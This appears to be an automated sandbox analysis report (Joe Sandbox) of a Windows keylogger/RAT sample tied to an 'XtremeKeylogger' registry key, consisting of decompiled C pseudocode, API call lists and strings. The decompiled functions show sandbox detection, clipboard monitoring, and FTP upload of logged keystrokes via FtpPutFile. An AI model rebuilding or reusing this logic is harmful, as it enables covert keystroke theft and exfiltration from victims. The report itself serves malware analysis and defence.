Part of subcall function 00C88494: RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C884EB

ExitProcess.KERNEL32(00000000), ref: 00C88AC0
ExitProcess.KERNEL32(00000000), ref: 00C88AD5
ExitProcess.KERNEL32(00000000), ref: 00C88BB2

Part of subcall function 00C8854C: GetUserNameA.ADVAPI32(00000000,?), ref: 00C88593

Part of subcall function 00C88324: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C8833C
Part of subcall function 00C88324: RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C88365
Part of subcall function 00C88324: RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C8837B

ExitProcess.KERNEL32(00000000), ref: 00C88AEA
ExitProcess.KERNEL32(00000000), ref: 00C88AFF
ExitProcess.KERNEL32(00000000), ref: 00C88B14
ExitProcess.KERNEL32(00000000), ref: 00C88B29
ExitProcess.KERNEL32(00000000), ref: 00C88B3E
ExitProcess.KERNEL32(00000000), ref: 00C88B53
ExitProcess.KERNEL32(00000000), ref: 00C88B68

Part of subcall function 00C882DC: GetModuleHandleA.KERNEL32(SbieDll.dll,?,00C8892E), ref: 00C882E4

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C88BC0, Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 182
librarysleep

C-Code - Quality: 46%

			E00C88BC0(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				long _t47;
				char* _t48;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr* _t54;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr* _t60;
				intOrPtr _t62;
				void* _t63;
				char* _t69;
				char* _t72;
				intOrPtr* _t79;
				intOrPtr* _t82;
				void* _t105;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr _t134;
				intOrPtr _t141;
				signed int _t144;
				intOrPtr _t147;

				_t146 = _t147;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t105 = _a4;
				_push(_t147);
				_push(0xc88e3f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147;
				LoadLibraryA("user32.dll");
				LoadLibraryA("urlmon.dll");
				LoadLibraryA("wininet.dll");
				LoadLibraryA("advapi32.dll");
				LoadLibraryA("Shell32.dll");
				_v8 = E00C8263C(0, 0, _t105 + 0x1310);
				_t47 = GetLastError();
				_t150 = _t47 - 0xb7;
				if(_t47 == 0xb7) {
					ExitProcess(0);
				}
				_t48 =  *0xc8b0f8; // 0xc8e014
				 *_t48 =  *((intOrPtr*)(_t105 + 0x1818));
				_t50 = E00C833A8(_t105 + 0x1618, 0xc88e90, _t150);
				_t116 =  *0xc8b100; // 0xc8e018
				 *_t116 = _t50;
				_t53 = E00C833A8(E00C836D8(_t105 + 0x1c30, _t150), _t105 + 0x1310, _t150);
				_t118 =  *0xc8b0f0; // 0xc8e01c
				 *_t118 = _t53;
				_t54 =  *0xc8b0f0; // 0xc8e01c
				_t56 = E00C833A8( *_t54, L".xtr", _t150);
				_t120 =  *0xc8b0f0; // 0xc8e01c
				 *_t120 = _t56;
				_t59 = E00C833A8(E00C836D8(_t105 + 0x1c30, _t150), _t105 + 0x1310, _t150);
				_t122 =  *0xc8b0f4; // 0xc8dec8
				 *_t122 = _t59;
				_t60 =  *0xc8b0f4; // 0xc8dec8
				_t62 = E00C833A8( *_t60, L".dat", _t150);
				_t124 =  *0xc8b0f4; // 0xc8dec8
				 *_t124 = _t62;
				_t63 =  *0xc8b0ec; // 0xc8c6ac
				_t143 = _t105;
				memcpy(_t63, _t105, 0x607 << 2);
				if( *((char*)(_t105 + 0x139c)) == 1) {
					E00C87744(_t143, _t146);
				}
				_t144 = 0;
				_t141 =  *0xc8b0fc; // 0xc8e000
				do {
					E00C81B78( &_v16);
					if( *((intOrPtr*)(_t105 + _t144 * 4)) > 0) {
						E00C81CD8( &_v20, 0x29, _t105 + 0x14 + _t144 * 0x29 * 2);
						E00C81DBC(_v20, 0);
						if(0 != 0) {
							_push(L"http://");
							_t130 = _t105 + 0x14 + _t144 * 0x29 * 2;
							E00C81CD8( &_v24, 0x29, _t105 + 0x14 + _t144 * 0x29 * 2);
							_push(_v24);
							_push(0xc88ec4);
							asm("cdq");
							E00C82E14( &_v28, 0x29, _t105 + 0x14 + _t144 * 0x29 * 2,  *((intOrPtr*)(_t105 + _t144 * 4)), _t130);
							_push(_v28);
							_push(0xc88ecc);
							E00C82E14( &_v32, 0x29, 0,  *((intOrPtr*)(_t105 + 0x11b4)), 0);
							_push(_v32);
							_push(L".functions");
							E00C81D74();
						}
					}
					E00C81DBC(_v16, 0);
					if(0 != 0) {
						E00C81BB4(_t141, _v16);
					}
					_t144 = _t144 + 1;
					_t141 = _t141 + 4;
				} while (_t144 != 5);
				_t69 =  *0xc8b104; // 0xc8b0d0
				 *_t69 = 0;
				E00C8384C(E00C87D60, 0, 0);
				while(1) {
					_t72 =  *0xc8b104; // 0xc8b0d0
					if( *_t72 != 0) {
						break;
					}
					Sleep(0xa);
					E00C83838();
				}
				CloseHandle(_v8);
				CloseHandle(_v12);
				E00C8684C();
				_t79 =  *0xc8b0f0; // 0xc8e01c
				E00C83674( *_t79);
				_t82 =  *0xc8b0e8; // 0xc8e020
				if( *_t82 == 0) {
					ExitProcess(0);
				}
				ShellExecuteW(0, L"open", _t105 + 0x181c, 0, 0, 0);
				ExitProcess(0);
				_pop(_t134);
				 *[fs:eax] = _t134;
				_push(E00C88E46);
				return E00C81B90( &_v32, 5);
			}

0x00c88bc1
0x00c88bc5
0x00c88bc6
0x00c88bc7
0x00c88bc8
0x00c88bc9
0x00c88bca
0x00c88bcb
0x00c88bcf
0x00c88bd4
0x00c88bd5
0x00c88bda
0x00c88bdd
0x00c88be5
0x00c88bef
0x00c88bf9
0x00c88c03
0x00c88c0d
0x00c88c22
0x00c88c25
0x00c88c2a
0x00c88c2f
0x00c88c33
0x00c88c33
0x00c88c38
0x00c88c43
0x00c88c50
0x00c88c55
0x00c88c5b
0x00c88c6e
0x00c88c73
0x00c88c79
0x00c88c80
0x00c88c87
0x00c88c8c
0x00c88c92
0x00c88ca5
0x00c88caa
0x00c88cb0
0x00c88cb7
0x00c88cbe
0x00c88cc3
0x00c88cc9
0x00c88ccb
0x00c88cd2
0x00c88cd9
0x00c88ce2
0x00c88ce4
0x00c88ce4
0x00c88ce9
0x00c88ceb
0x00c88cf1
0x00c88cf4
0x00c88cfd
0x00c88d0e
0x00c88d18
0x00c88d1d
0x00c88d1f
0x00c88d2a
0x00c88d33
0x00c88d38
0x00c88d3b
0x00c88d43
0x00c88d49
0x00c88d4e
0x00c88d51
0x00c88d63
0x00c88d68
0x00c88d6b
0x00c88d78
0x00c88d78
0x00c88d1d
0x00c88d82
0x00c88d87
0x00c88d8e
0x00c88d8e
0x00c88d93
0x00c88d94
0x00c88d97
0x00c88da0
0x00c88da5
0x00c88db3
0x00c88dc6
0x00c88dc6
0x00c88dce
0x00000000
0x00000000
0x00c88dbc
0x00c88dc1
0x00c88dc1
0x00c88dd4
0x00c88ddd
0x00c88de2
0x00c88de7
0x00c88dee
0x00c88df3
0x00c88dfb
0x00c88dff
0x00c88dff
0x00c88e18
0x00c88e1f
0x00c88e26
0x00c88e29
0x00c88e2c
0x00c88e3e

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 00C88BE5
LoadLibraryA.KERNEL32(urlmon.dll), ref: 00C88BEF
LoadLibraryA.KERNEL32(wininet.dll), ref: 00C88BF9
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88C03
LoadLibraryA.KERNEL32(Shell32.dll), ref: 00C88C0D

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

GetLastError.KERNEL32(00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000,00000000), ref: 00C88C25
ExitProcess.KERNEL32(00000000,00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000), ref: 00C88C33

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000), ref: 00C83721
Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000), ref: 00C83775

Part of subcall function 00C81B78: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C8384C: CreateThread.KERNEL32(00000000,00000000,00C87D60,00000000,?,?), ref: 00C83862
Part of subcall function 00C8384C: SetThreadPriority.KERNEL32(00000000,00000000,00000001,?,00000000,?,00C88DB8,00000000), ref: 00C8386B

Sleep.KERNEL32(0000000A,00000000), ref: 00C88DBC
CloseHandle.KERNEL32(?), ref: 00C88DD4
CloseHandle.KERNEL32(?), ref: 00C88DDD

Part of subcall function 00C8684C: SendMessageA.USER32(00000000,0000C1F2,00000000,00000000), ref: 00C86865
Part of subcall function 00C8684C: CloseHandle.KERNEL32(00000000), ref: 00C86879

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

ExitProcess.KERNEL32(00000000,?,?,0000000A,00000000), ref: 00C88DFF
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C88E18
ExitProcess.KERNEL32(00000000,00000000,open,?,00000000,00000000,00000000,?,?,0000000A,00000000), ref: 00C88E1F

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Part of subcall function 00C87744: ShowWindow.USER32(00000000,00000000), ref: 00C8777B
Part of subcall function 00C87744: SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00C8778B
Part of subcall function 00C87744: CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000004,00000000,00000000), ref: 00C877A5
Part of subcall function 00C87744: GetFileSize.KERNEL32(00000000,00000000,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080), ref: 00C877C4
Part of subcall function 00C87744: SetFileAttributesW.KERNEL32(00000000,00000007,00000000,00000000,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080), ref: 00C8781C
Part of subcall function 00C87744: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000007,00000000,00000000,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000), ref: 00C8782D
Part of subcall function 00C87744: SendMessageA.USER32(00000000,0000C1F3,00000000,00000000), ref: 00C87888
Part of subcall function 00C87744: SetClipboardViewer.USER32(00000000), ref: 00C87893

Strings

advapi32.dll, xrefs: 00C88BFE
urlmon.dll, xrefs: 00C88BEA
user32.dll, xrefs: 00C88BE0
.xtr, xrefs: 00C88C7B
Shell32.dll, xrefs: 00C88C08
open, xrefs: 00C88E11
.dat, xrefs: 00C88CB2
wininet.dll, xrefs: 00C88BF4
http://, xrefs: 00C88D1F
.functions, xrefs: 00C88D6B

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C873E0, Relevance: 21.2, APIs: 14, Instructions: 177
windowfile

C-Code - Quality: 98%

			E00C873E0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v9;
				void _v16;
				long _v24;
				long _v28;
				long _v32;
				long _v40;
				long _v44;
				char _v45;
				void _v46;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t43;
				long _t45;
				long _t46;
				long _t47;
				int _t48;
				struct HWND__* _t49;
				long _t51;
				void* _t52;
				void* _t59;
				void* _t61;
				int _t63;
				struct HWND__* _t64;
				WCHAR* _t92;
				long _t99;
				long _t100;
				void* _t103;
				void* _t104;
				long _t105;
				void* _t107;

				_t92 = __ecx;
				_v8 = __edx;
				_t103 = __eax;
				_v9 = 0;
				if( *0xc8dee8 == 0xffffffff) {
					L23:
					return _v9;
				}
				_v44 = 0;
				_v40 = 0;
				_t43 =  *0xc8dee8; // 0x0
				_v28 = GetFileSize(_t43, 0);
				_v24 = 0;
				if(_v24 != 0) {
					if(__eflags <= 0) {
						L6:
						if(_v40 != 0) {
							if(__eflags <= 0) {
								goto L23;
							}
							L10:
							_t45 = E00C852E8(_t92);
							asm("cdq");
							 *0xc8b0c8 = _t45;
							 *0xc8b0cc = 0;
							_t46 =  *0xc8b0c8; // 0x0
							_t99 =  *0xc8b0cc; // 0x0
							__eflags = _t99 - _v40;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L15:
									_t47 =  *0xc8b0c8; // 0x0
									_t100 =  *0xc8b0cc; // 0x0
									__eflags = _t100 - _v40;
									if(_t100 != _v40) {
										L17:
										__eflags =  *0xc8b0b4;
										if( *0xc8b0b4 != 0) {
											_t48 =  *0xc8ded0; // 0xc1f2
											_t49 =  *0xc8b0b4; // 0x0
											SendMessageA(_t49, _t48, 0, 0);
											_t51 =  *0xc8b0c8; // 0x0
											_t52 =  *0xc8dee8; // 0x0
											SetFilePointer(_t52, _t51, 0, 0);
											_t105 = _v44;
											_v16 = VirtualAlloc(0, _t105 -  *0xc8b0c8, 0x1000, 4);
											_t59 =  *0xc8dee8; // 0x0
											ReadFile(_t59, _v16, _t105 -  *0xc8b0c8,  &_v32, 0);
											_t61 =  *0xc8dee8; // 0x0
											SetFilePointer(_t61, 0, 0, 2);
											_t63 =  *0xc8ded4; // 0xc1f3
											_t64 =  *0xc8b0b4; // 0x0
											SendMessageA(_t64, _t63, 0, 0);
											SetFileAttributesW(_t92, 0x80);
											DeleteFileW(_t92);
											_t107 = CreateFileW(_t92, 0x40000000, 0, 0, 2, 0, 0);
											__eflags = _t107 - 0xffffffff;
											if(_t107 != 0xffffffff) {
												_v46 = 0xff;
												_v45 = 0xfe;
												WriteFile(_t107,  &_v46, 2,  &_v32, 0);
												__eflags = _v44 -  *0xc8b0c8;
												E00C85084(_t107, _v44 -  *0xc8b0c8, _v16, 0,  &_v32);
												VirtualFree( &_v16, 0, 0x8000);
											}
											CloseHandle(_t107);
											_v9 = E00C87918(_t103, _t92, _v8, _a4, _a8, _a12);
											__eflags = _v9 - 1;
											if(_v9 == 1) {
												 *0xc8b0c8 = _v44;
												 *0xc8b0cc = _v40;
												E00C853EC(_v44, _t92, _t107);
											}
											DeleteFileW(_t92);
										}
										goto L23;
									}
									__eflags = _t47 - _v44;
									if(_t47 == _v44) {
										goto L23;
									}
									goto L17;
								}
								L14:
								 *0xc8b0c8 = 0;
								 *0xc8b0cc = 0;
								E00C853EC(0, _t92, _t104);
								goto L17;
							}
							__eflags = _t46 - _v44;
							if(_t46 <= _v44) {
								goto L15;
							}
							goto L14;
						}
						if(_v44 > 0) {
							goto L10;
						}
						goto L23;
					}
					L5:
					_v44 = _v28;
					_v40 = _v24;
					goto L6;
				}
				if(_v28 <= 0) {
					goto L6;
				}
				goto L5;
			}

0x00c873e9
0x00c873eb
0x00c873ee
0x00c873f0
0x00c873fb
0x00c87607
0x00c87610
0x00c87610
0x00c87401
0x00c87408
0x00c87411
0x00c8741e
0x00c87421
0x00c87428
0x00c87432
0x00c87440
0x00c87444
0x00c87451
0x00000000
0x00000000
0x00c87457
0x00c87457
0x00c8745c
0x00c8745d
0x00c87463
0x00c87469
0x00c8746f
0x00c87475
0x00c87478
0x00c87481
0x00c874a0
0x00c874a0
0x00c874a6
0x00c874ac
0x00c874af
0x00c874ba
0x00c874ba
0x00c874c1
0x00c874cb
0x00c874d1
0x00c874d7
0x00c874e0
0x00c874e6
0x00c874ec
0x00c874f8
0x00c8750b
0x00c8751f
0x00c87525
0x00c87530
0x00c87536
0x00c8753f
0x00c87545
0x00c8754b
0x00c87556
0x00c8755c
0x00c87576
0x00c87578
0x00c8757b
0x00c8757d
0x00c87581
0x00c87592
0x00c875a0
0x00c875ab
0x00c875bb
0x00c875bb
0x00c875c1
0x00c875de
0x00c875e1
0x00c875e5
0x00c875ea
0x00c875f3
0x00c875fc
0x00c875fc
0x00c87602
0x00c87602
0x00000000
0x00c874c1
0x00c874b1
0x00c874b4
0x00000000
0x00000000
0x00000000
0x00c874b4
0x00c87483
0x00c87483
0x00c8748d
0x00c87499
0x00000000
0x00c87499
0x00c8747a
0x00c8747d
0x00000000
0x00000000
0x00000000
0x00c8747f
0x00c8744a
0x00000000
0x00000000
0x00000000
0x00c8744c
0x00c87434
0x00c87437
0x00c8743d
0x00000000
0x00c8743d
0x00c8742e
0x00000000
0x00000000
0x00000000

APIs

GetFileSize.KERNEL32(00000000,00000000), ref: 00C87417

Part of subcall function 00C852E8: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000,00C853AA,?,XtremeKeylogger), ref: 00C8534C
Part of subcall function 00C852E8: RegQueryValueExW.ADVAPI32(?,LastSize,00000000,?,?,?,80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000,00C853AA), ref: 00C8537A
Part of subcall function 00C852E8: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,?,?,?,80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000), ref: 00C8538A

SendMessageA.USER32(00000000,0000C1F2,00000000,00000000), ref: 00C874D7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,0000C1F2,00000000,00000000,00000000,00000000), ref: 00C874EC
VirtualAlloc.KERNEL32(00000000,-00C8B0C8,00001000,00000004,00000000,00000000,00000000,00000000,00000000,0000C1F2,00000000,00000000,00000000,00000000), ref: 00C87506
ReadFile.KERNEL32(00000000,?,-00C8B0C8,?,00000000), ref: 00C87525
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,-00C8B0C8,?,00000000,00000000,-00C8B0C8,00001000,00000004,00000000,00000000,00000000), ref: 00C87536
SendMessageA.USER32(00000000,0000C1F3,00000000,00000000), ref: 00C8754B
SetFileAttributesW.KERNEL32(?,00000080,00000000,0000C1F3,00000000,00000000,00000000,00000000,00000000,00000002,00000000,?,-00C8B0C8,?,00000000,00000000), ref: 00C87556
DeleteFileW.KERNEL32(?,?,00000080,00000000,0000C1F3,00000000,00000000,00000000,00000000,00000000,00000002,00000000,?,-00C8B0C8,?,00000000), ref: 00C8755C
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00C87571
WriteFile.KERNEL32(00000000,000000FF,00000002,?,00000000), ref: 00C87592

Part of subcall function 00C85084: WriteFile.KERNEL32(00000000,?,00000002,?,?), ref: 00C850AA

VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,00000000,000000FF,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000000), ref: 00C875BB
CloseHandle.KERNEL32(00000000), ref: 00C875C1

Part of subcall function 00C87918: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C87933
Part of subcall function 00C87918: InternetConnectW.WININET(00000000,?,00000015,?,?,00000001,08000000,00000000), ref: 00C8794F
Part of subcall function 00C87918: FtpSetCurrentDirectoryW.WININET(00000000,?), ref: 00C8795B
Part of subcall function 00C87918: WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 00C8796C
Part of subcall function 00C87918: FtpPutFileW.WININET(00000000,?,00000000,00000002,00000000), ref: 00C8797E
Part of subcall function 00C87918: InternetCloseHandle.WININET(00000000), ref: 00C8798A
Part of subcall function 00C87918: InternetCloseHandle.WININET(00000000), ref: 00C87990

DeleteFileW.KERNEL32(?,?,?,?,00000000,?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,00000080,00000000), ref: 00C87602

Part of subcall function 00C853EC: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4,?,SOFTWARE\,00000000,00C854AA,?,?), ref: 00C8545A
Part of subcall function 00C853EC: RegSetValueExW.ADVAPI32(?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4), ref: 00C85481
Part of subcall function 00C853EC: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00C8548A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C83280, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 120

C-Code - Quality: 96%

			E00C83280(WCHAR* __eax, intOrPtr* __edx) {
				short _t8;
				short _t9;
				WCHAR* _t10;
				short _t12;
				WCHAR* _t14;
				short _t16;
				WCHAR* _t17;
				short _t19;
				WCHAR* _t21;
				WCHAR* _t24;
				WCHAR* _t25;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				signed int _t34;
				intOrPtr* _t35;
				intOrPtr _t36;
				long _t37;
				signed int _t38;
				WCHAR* _t39;

				_t35 = __edx;
				_t24 = __eax;
				 *__edx = 0;
				while(1) {
					L2:
					_t8 =  *_t24;
					if(_t8 != 0 && _t8 <= 0x20) {
						_t24 = CharNextW(_t24);
					}
					L2:
					_t8 =  *_t24;
					if(_t8 != 0 && _t8 <= 0x20) {
						_t24 = CharNextW(_t24);
					}
					L4:
					if( *_t24 != 0x22 || _t24[1] != 0x22) {
						_t37 = 0;
						_t39 = _t24;
						while(1) {
							_t9 =  *_t24;
							if(_t9 <= 0x20) {
								break;
							}
							if(_t9 != 0x22) {
								_t10 = CharNextW(_t24);
								_t28 = _t10 - _t24;
								_t29 = _t28 >> 1;
								if(_t28 < 0) {
									asm("adc edx, 0x0");
								}
								_t37 = _t37 + _t29;
								_t24 = _t10;
								continue;
							}
							_t24 = CharNextW(_t24);
							while(1) {
								_t12 =  *_t24;
								if(_t12 == 0 || _t12 == 0x22) {
									break;
								}
								_t14 = CharNextW(_t24);
								_t33 = _t14 - _t24;
								_t34 = _t33 >> 1;
								if(_t33 < 0) {
									asm("adc edx, 0x0");
								}
								_t37 = _t37 + _t34;
								_t24 = _t14;
							}
							if( *_t24 != 0) {
								_t24 = CharNextW(_t24);
							}
						}
						 *_t35 = VirtualAlloc(0, _t37, 0x1000, 4);
						_t25 = _t39;
						_t36 =  *_t35;
						_t38 = 0;
						while(1) {
							_t16 =  *_t25;
							if(_t16 <= 0x20) {
								break;
							}
							if(_t16 != 0x22) {
								_t17 = CharNextW(_t25);
								if(_t17 <= _t25) {
									continue;
								} else {
									goto L31;
								}
								do {
									L31:
									 *((short*)(_t36 + _t38 * 2)) =  *_t25;
									_t25 =  &(_t25[1]);
									_t38 = _t38 + 1;
								} while (_t17 > _t25);
								continue;
							}
							_t25 = CharNextW(_t25);
							while(1) {
								_t19 =  *_t25;
								if(_t19 == 0 || _t19 == 0x22) {
									break;
								}
								_t21 = CharNextW(_t25);
								if(_t21 <= _t25) {
									continue;
								} else {
									goto L25;
								}
								do {
									L25:
									 *((short*)(_t36 + _t38 * 2)) =  *_t25;
									_t25 =  &(_t25[1]);
									_t38 = _t38 + 1;
								} while (_t21 > _t25);
							}
							if( *_t25 != 0) {
								_t25 = CharNextW(_t25);
							}
						}
						return _t25;
					} else {
						_t24 =  &(_t24[2]);
						continue;
					}
				}
			}

0x00c83284
0x00c83286
0x00c8328a
0x00c83296
0x00c83296
0x00c83296
0x00c8329c
0x00c83294
0x00c83294
0x00c83296
0x00c83296
0x00c8329c
0x00c83294
0x00c83294
0x00c832a4
0x00c832a8
0x00c832b6
0x00c832b8
0x00c83314
0x00c83314
0x00c8331b
0x00000000
0x00000000
0x00c832c0
0x00c83300
0x00c83307
0x00c83309
0x00c8330b
0x00c8330d
0x00c8330d
0x00c83310
0x00c83312
0x00000000
0x00c83312
0x00c832c8
0x00c832e1
0x00c832e1
0x00c832e7
0x00000000
0x00000000
0x00c832cd
0x00c832d4
0x00c832d6
0x00c832d8
0x00c832da
0x00c832da
0x00c832dd
0x00c832df
0x00c832df
0x00c832f3
0x00c832fb
0x00c832fb
0x00c832f3
0x00c8332c
0x00c8332e
0x00c83330
0x00c83332
0x00c83396
0x00c83396
0x00c8339d
0x00000000
0x00000000
0x00c8333a
0x00c8337e
0x00c83385
0x00000000
0x00000000
0x00000000
0x00000000
0x00c83387
0x00c83387
0x00c8338a
0x00c8338e
0x00c83391
0x00c83392
0x00000000
0x00c83387
0x00c83342
0x00c8335f
0x00c8335f
0x00c83365
0x00000000
0x00000000
0x00c83347
0x00c8334e
0x00000000
0x00000000
0x00000000
0x00000000
0x00c83350
0x00c83350
0x00c83353
0x00c83357
0x00c8335a
0x00c8335b
0x00c83350
0x00c83371
0x00c83379
0x00c83379
0x00c83371
0x00c833a5
0x00c832b1
0x00c832b1
0x00000000
0x00c832b1
0x00c832a8

APIs

CharNextW.USER32(00000000), ref: 00C8328F
CharNextW.USER32(00000000), ref: 00C832C3
CharNextW.USER32(00000000), ref: 00C832CD
CharNextW.USER32(00000000), ref: 00C832F6
CharNextW.USER32(00000000), ref: 00C83300
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,?,?,00000000,00000001,00C8347B,00000000,00C83498), ref: 00C83327
CharNextW.USER32(00000000), ref: 00C8333D
CharNextW.USER32(00000000), ref: 00C83347
CharNextW.USER32(00000000), ref: 00C83374
CharNextW.USER32(00000000), ref: 00C8337E

Strings

", xrefs: 00C832AA
", xrefs: 00C832A4

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C879DA, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 35
registryclipboard

C-Code - Quality: 60%

			E00C879DA() {
				intOrPtr _t11;
				intOrPtr _t14;

				_push(_t14);
				_push(0xc87a5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t14;
				 *0xc8dee4 =  *0xc8dee4 - 1;
				if( *0xc8dee4 < 0) {
					 *0xc8decc = RegisterClipboardFormatW(L"jiejwogfdjieovevodnvfnievn");
					 *0xc8ded0 = RegisterClipboardFormatW(L"trhgtehgfsgrfgtrwegtre");
					 *0xc8ded4 = RegisterClipboardFormatW(L"jytjyegrsfvfbgfsdf");
					 *0xc8ded8 = RegisterClipboardFormatW(L"hgtrfsgfrsgfgregtregtr");
					 *0xc8dedc = RegisterClipboardFormatW(L"frgjbfdkbnfsdjbvofsjfrfre");
					 *0xc8dee0 = RegisterClipboardFormatW(L"frgkmjgtmklgtlrglt");
				}
				_pop(_t11);
				 *[fs:eax] = _t11;
				_push(E00C87A65);
				return 0;
			}

0x00c879e1
0x00c879e2
0x00c879e7
0x00c879ea
0x00c879ed
0x00c879f4
0x00c87a00
0x00c87a0f
